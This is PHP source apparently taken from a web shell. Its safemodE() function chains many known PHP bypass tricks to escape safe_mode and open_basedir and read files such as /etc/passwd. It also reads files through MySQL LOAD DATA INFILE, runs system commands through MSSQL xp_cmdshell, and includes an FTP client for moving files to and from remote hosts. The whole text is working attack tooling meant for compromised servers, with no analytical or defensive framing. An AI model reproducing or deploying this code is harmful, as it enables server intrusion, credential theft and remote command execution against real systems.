function safemodE()
{
global $windows, $t, $hcwd, $et;
$file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
$pr = "\r\n</font><font color=green>Method ";
$po = ")</font><font color=blue>\r\n";
$i = 1;
if (!empty($_REQUEST['read'])) {
echo "<pre>{$pr}{$i}:(ini_restore{$po}";
ini_restore('safe_mode');
ini_restore('open_basedir');
readfile($file);
$i++;
echo "{$pr}{$i}:(include{$po}";
include $file;
$i++;
echo "{$pr}{$i}:(copy{$po}";
$tmp = tempnam('', 'cx');
copy('compress.zlib://' . $file, $tmp);
$fh = fopen($tmp, 'r');
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if (function_exists('mb_send_mail')) {
echo "{$pr}{$i}:(mb_send_mail{$po}";
if (file_exists('/tmp/mb_send_mail')) {
unlink('/tmp/mb_send_mail');
}
mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
readfile('/tmp/mb_send_mail');
$i++;
}
if (function_exists('curl_init')) {
echo "{$pr}{$i}:(curl_init [A]{$po}";
$fh = curl_init('file://' . $file . '');
$tmp = curl_exec($fh);
echo $tmp;
$i++;
echo "{$pr}{$i}:(curl_init [B]{$po}";
$i++;
if (strstr($file, DIRECTORY_SEPARATOR)) {
$ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
} else {
$ch = curl_init('file://' . $file . "" . __FILE__);
}
var_dump(curl_exec($ch));
}
if (is_writable('.')) {
echo "{$pr}{$i}:(php.ini{$po}";
file_put_contents('php.ini', 'safe_mode = Off');
readfile($file);
unlink('php.ini');
$i++;
}
if (is_object($ws = new COM('WScript.Shell'))) {
echo "{$pr}{$i}:(COM{$po}";
echo $exec = comshelL("type \"{$file}\"", $ws);
$i++;
}
if (checkfunctioN('win_shell_execute')) {
echo "{$pr}{$i}:(win32std{$po}";
echo winshelL("type \"{$file}\"");
$i++;
}
if (checkfunctioN('win32_create_service')) {
echo "{$pr}{$i}:(win32service{$po}";
echo srvshelL("type \"{$file}\"");
$i++;
}
if (function_exists('imap_open')) {
echo "{$pr}{$i}:(imap [A]{$po}";
$str = imap_open('/etc/passwd', '', '');
$list = imap_list($str, $file, '*');
for ($i = 0; $i < count($list); $i++) {
echo $list[$i] . "\n";
}
imap_close($str);
$i++;
echo "{$pr}{$i}:(imap [B]{$po}";
$str = imap_open($file, '', '');
$tmp = imap_body($str, 1);
echo $tmp;
imap_close($str);
$i++;
}
if ($file == '/etc/passwd') {
echo "{$pr}{$i}:(posix{$po}";
for ($uid = 0; $uid < 99999; $uid++) {
$h = posix_getpwuid($uid);
if (!empty($h)) {
foreach ($h as $v) {
echo "{$v}:";
}
}
echo "\r\n";
}
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['show'])) {
echo "<pre>{$pr}{$i}:(glob{$po}";
$con = glob("{$file}*");
foreach ($con as $v) {
echo "{$v}\n";
}
$i++;
if (function_exists('imap_open')) {
echo "{$pr}{$i}:(imap{$po}";
$str = imap_open('/etc/passwd', '', '');
$s = explode("|", $file);
if (count($s) > 1) {
$list = imap_list($str, trim($s[0]), trim($s[1]));
} else {
$list = imap_list($str, trim($str[0]), '*');
}
for ($i = 0; $i < count($list); $i++) {
echo "{$list[$i]}\r\n";
}
imap_close($str);
$i++;
}
if (is_object($ws = new COM('WScript.Shell'))) {
echo "{$pr}{$i}:(COM{$po}";
$exec = comshelL("dir \"{$file}\"", $ws);
$exec = str_replace("\t", '', $exec);
echo $exec;
$i++;
}
if (checkfunctioN('win_shell_execute')) {
echo "{$pr}{$i}:(win32std{$po}";
echo winshelL("dir \"{$file}\"");
$i++;
}
if (checkfunctioN('win32_create_service')) {
echo "{$pr}{$i}:(win32service{$po}";
echo srvshelL("dir \"{$file}\"");
$i++;
}
echo "\n</pre></font>";
} elseif (!empty($_REQUEST['sql'])) {
$ta = uniqid('N');
$s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
$l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
mysql_select_db($_REQUEST['db'], $l);
echo '<pre><font color=blue>';
foreach ($s as $v) {
$q = mysql_query($v, $l);
while ($d = mysql_fetch_row($q)) {
echo htmlspecialchars($d[0]);
}
}
echo '</pre></font>';
} elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
$res = '';
$tb = uniqid('NJ');
$db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'], $db);
mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
$re = mssql_query("select * from {$tb}", $db);
while ($row = mssql_fetch_row($re)) {
$res .= $row[0] . "\r\n";
}
mssql_query("drop table {$tb}", $db);
mssql_close($db);
echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>";
}
$f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
$u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam';
$p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
$d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
if (!empty($_REQUEST['serveR'])) {
echo htmlspecialchars($_REQUEST['serveR']);
} else {
echo 'localhost';
}
echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) {
echo htmlspecialchars($_REQUEST['useR']);
} else {
echo 'sa';
}
echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
if (!empty($_REQUEST['pasS'])) {
echo htmlspecialchars($_REQUEST['pasS']);
}
echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
if (!empty($_REQUEST['coM'])) {
echo htmlspecialchars($_REQUEST['coM']);
} else {
echo 'dir c:';
}
echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
if (isset($_REQUEST['dB'])) {
echo htmlspecialchars($_REQUEST['dB']);
} else {
echo 'master';
}
echo "'> {$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>";
}
function ftpclienT()
{
global $cwd, $hcwd;
if (!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && checkfunctioN('ftp_connect')) {
$user = $_REQUEST['useR'];
$pass = $_REQUEST['pasS'];
$host = $_REQUEST['hosT'];
$con = ftp_connect($_REQUEST['hosT'], 21, 10);
if ($con) {
if (ftp_login($con, $user, $pass)) {
if (!empty($_REQUEST['PWD'])) {
ftp_chdir($con, $_REQUEST['PWD']);
}
if (!empty($_REQUEST['filE'])) {
$file = $_REQUEST['filE'];
$mode = isset($_REQUEST['modE']) ? FTP_BINARY : FTP_ASCII;
if (isset($_REQUEST['geT'])) {
ftp_get($con, $file, $file, $mode);
} elseif (isset($_REQUEST['puT'])) {
ftp_put($con, $file, $file, $mode);
} elseif (isset($_REQUEST['rM'])) {
ftp_rmdir($con, $file);
ftp_delete($con, $file);
} elseif (isset($_REQUEST['mD'])) {
ftp_mkdir($con, $file);
}
}
$pwd = ftp_pwd($con);
$dir = ftp_rawlist($con, '-la .');
$d = opendir($cwd);
echo "<table border=0 cellspacing=0 cellpadding=0><tr><th>{$host}</th><th>";
if (!empty($_SERVER['SERVER_ADDR'])) {
echo $_SERVER['SERVER_ADDR'];
} else {
echo '127.0.0.1';
}
echo "</th></tr><form method=POST><tr><td><input type=text value='{$pwd}' name=PWD size=50><input value=Change class=buttons type=submit></td><td><input size=50 type=text value='{$cwd}' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr><td>";
foreach ($dir as $n) {
echo "{$n}<br />";
}
echo "</td><td>";
while ($cdir = readdir($d)) {
if ($cdir != '.' && $cdir != '..') {
echo "{$cdir}<br>";
}
}
echo "</td></tr><tr><td colspan=2>Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td><td><input type=hidden value='{$user}' name=useR><input type=hidden value='{$pass}' name=pasS><input type=hidden value='{$host}' name=hosT></form></tr></td></table>";
} else {
echo "Wrong username or password!";
}
} else {
echo "Can not connect to server!";
}
} else {
echo '
<form name=client method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">FTP client</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="hosT" value="localhost" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="anonymous" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="*****@*****.**" size="30" />
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Connect" style="margin-left: 150px;" />
</div></form>';
}
}
